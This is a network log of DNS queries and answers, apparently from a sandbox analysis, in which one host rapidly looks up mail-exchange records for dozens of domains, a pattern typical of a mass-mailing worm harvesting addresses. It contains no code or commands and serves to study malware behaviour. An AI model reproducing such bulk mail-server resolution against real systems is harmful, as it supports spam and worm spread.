Feb 20, 2023 09:52:03.556730032 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.077861071 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	haxx.se	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.126305103 CET	192.168.2.5	8.8.8.8	0xde3f	Standard query (0)	silly.haxx.se	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:04.673842907 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.759416103 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	adatum.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:04.787945032 CET	192.168.2.5	8.8.8.8	0x70b7	Standard query (0)	mail.adatum.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:04.853368044 CET	192.168.2.5	8.8.8.8	0x8681	Standard query (0)	adobe-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:06.060075045 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.173703909 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.591150045 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.671349049 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fabrikam.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:06.707902908 CET	192.168.2.5	8.8.8.8	0x75df	Standard query (0)	mail.fabrikam.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:06.991269112 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.035619974 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.256457090 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.374428034 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.387087107 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.489018917 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:08.598915100 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:08.607754946 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:52:08.715301037 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.798008919 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.801836014 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:52:08.836277008 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:08.984890938 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:52:09.010449886 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:52:09.078521967 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:52:09.469206095 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:52:09.475375891 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.481149912 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:52:09.486629009 CET	192.168.2.5	8.8.8.8	0x7d9a	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.489204884 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	autoitscript.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.532263994 CET	192.168.2.5	8.8.8.8	0x89dd	Standard query (0)	autoitscript-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:09.889580965 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.893265009 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:52:09.899550915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:09.905050039 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.005204916 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.011732101 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pobox.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.094343901 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:10.102705002 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:52:10.117830992 CET	192.168.2.5	8.8.8.8	0xb337	Standard query (0)	pb-mx11.pobox.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:10.919219017 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:52:10.919554949 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:10.919665098 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:11.014442921 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:11.105421066 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	negdje.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:11.115976095 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:52:11.118710995 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.577239037 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netcom.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.673945904 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:52:12.674037933 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdef.hr	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.674097061 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.723931074 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.727073908 CET	192.168.2.5	8.8.8.8	0xb0e3	Standard query (0)	mx01.earthlink-vadesecure.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:12.733110905 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	northcoast.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:12.981264114 CET	192.168.2.5	8.8.8.8	0xaedd	Standard query (0)	mxb-00377f01.gslb.pphosted.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:13.266091108 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.268438101 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.268997908 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	netko.hr	0	3840	false
Feb 20, 2023 09:52:13.269803047 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:13.901352882 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:13.978583097 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tvrtka.hr	0	3840	false
Feb 20, 2023 09:52:13.978663921 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:13.986027002 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:13.996675014 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.216034889 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:14.302498102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:14.394100904 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	arb.cz	0	3840	false
Feb 20, 2023 09:52:14.394349098 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	cl.cam.ac.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.492762089 CET	192.168.2.5	8.8.8.8	0x9e11	Standard query (0)	mx.cam.ac.uk	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:14.963118076 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:14.984153032 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:15.095721960 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	abcdefg.cz	0	3840	false
Feb 20, 2023 09:52:15.612560987 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:15.622543097 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ektro.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.686995983 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	src.dec.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.918404102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	tek-astore.cz	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:16.923082113 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:17.954921007 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	theriver.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.076663971 CET	192.168.2.5	8.8.8.8	0x569c	Standard query (0)	ismtp.sitestar.everyone.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:18.344944954 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	src.dec.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.481230974 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	somemail.ro	0	3840	false
Feb 20, 2023 09:52:18.619824886 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:18.710385084 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bryson.demon.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.719311953 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	emaiserver.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.785293102 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.913155079 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	worldwideoffices.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:18.913237095 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	onlineconnections.com.au	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:19.277873993 CET	192.168.2.5	8.8.8.8	0x8f88	Standard query (0)	onlineconnections.com.au	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:19.383297920 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	orice.ro	0	3840	false
Feb 20, 2023 09:52:19.780833006 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x	0	15	false
Feb 20, 2023 09:52:20.009655952 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	src.dec.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.283066034 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	ppp.ro	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.477914095 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bryson.demon.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.988312960 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	openoffice.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:20.993719101 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	uiuc.edu	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:21.015558004 CET	192.168.2.5	8.8.8.8	0xa4ae	Standard query (0)	mx2-lw-eu.apache.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:21.029397011 CET	192.168.2.5	8.8.8.8	0x69fc	Standard query (0)	incoming-relays.illinois.edu	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:23.315038919 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	linuxnet.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.315953016 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	src.dec.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.316406965 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	jk.uni-linz.ac.at	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.316895008 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bryson.demon.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:23.422354937 CET	192.168.2.5	8.8.8.8	0x4716	Standard query (0)	mail3.edvz.uni-linz.ac.at	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:23.730288982 CET	192.168.2.5	8.8.8.8	0x49b	Standard query (0)	linuxnet.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:24.187211037 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bryson.demon.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.188864946 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	openoffice.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:24.213040113 CET	192.168.2.5	8.8.8.8	0x4c7	Standard query (0)	mx1-lw-eu.apache.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:25.552150011 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	openoffice.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.555005074 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	cdata.tvnet.hu	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:25.582818985 CET	192.168.2.5	8.8.8.8	0xc89b	Standard query (0)	mx1-lw-eu.apache.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:25.633441925 CET	192.168.2.5	8.8.8.8	0x5a7d	Standard query (0)	cdata.tvnet.hu	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:26.918253899 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	cdata.tvnet.hu	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:26.920257092 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:26.968558073 CET	192.168.2.5	8.8.8.8	0x8a38	Standard query (0)	cdata.tvnet.hu	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:28.354849100 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.409698009 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	litwareinc.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.455787897 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	example.mx	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.480895996 CET	192.168.2.5	8.8.8.8	0xec3c	Standard query (0)	smtp.litwareinc.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:28.546715975 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	proseware.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.549681902 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.667476892 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	fabrikam.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:28.700731039 CET	192.168.2.5	8.8.8.8	0xe40d	Standard query (0)	mail.fabrikam.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:52:28.970740080 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.154721022 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.302870989 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.331284046 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.402739048 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.480679035 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.617352962 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.678884983 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.692491055 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.709577084 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	musical.com.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.763267994 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.844022036 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:52:29.847074986 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:52:29.979403973 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 20, 2023 09:50:33.708488941 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:33.708488941 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:33.708488941 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:33.759432077 CET	8.8.8.8	192.168.2.5	0xcca9	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:35.165070057 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gzip.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:35.199630976 CET	8.8.8.8	192.168.2.5	0x30cb	No error (0)	gzip.org		85.187.148.2	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:35.420696974 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	alumni.caltech.edu			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:35.454116106 CET	8.8.8.8	192.168.2.5	0x5685	No error (0)	alumni-caltech-edu.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:35.454116106 CET	8.8.8.8	192.168.2.5	0x5685	No error (0)	alumni-caltech-edu.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.213716030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.213716030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.213716030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.213716030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.213716030 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.242996931 CET	8.8.8.8	192.168.2.5	0xced5	No error (0)	aspmx.l.google.com		142.250.27.26	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.737242937 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.737242937 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.737242937 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.737242937 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.737242937 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	cryptsoft.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.774624109 CET	8.8.8.8	192.168.2.5	0xbd60	No error (0)	aspmx.l.google.com		142.250.27.26	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.965387106 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	nongnu.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:37.102286100 CET	8.8.8.8	192.168.2.5	0xc140	No error (0)	eggs.gnu.org		209.51.188.92	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:41.733701944 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	nongnu.org			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.005897999 CET	8.8.8.8	192.168.2.5	0x6678	No error (0)	eggs.gnu.org		209.51.188.92	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:42.365084887 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	kinoho.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.365084887 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	kinoho.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.365084887 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	kinoho.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.365084887 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	kinoho.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.365084887 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	kinoho.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.402328014 CET	8.8.8.8	192.168.2.5	0xf686	No error (0)	aspmx.l.google.com		142.250.102.26	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:42.750166893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.750166893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.750166893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.750166893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.750166893 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.788300037 CET	8.8.8.8	192.168.2.5	0xd3c5	No error (0)	gmail-smtp-in.l.google.com		142.250.27.27	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:43.060803890 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	riseup.net			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.103163004 CET	8.8.8.8	192.168.2.5	0x789e	No error (0)	mx1.riseup.net		198.252.153.129	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:43.684453011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.684453011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.684453011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.684453011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
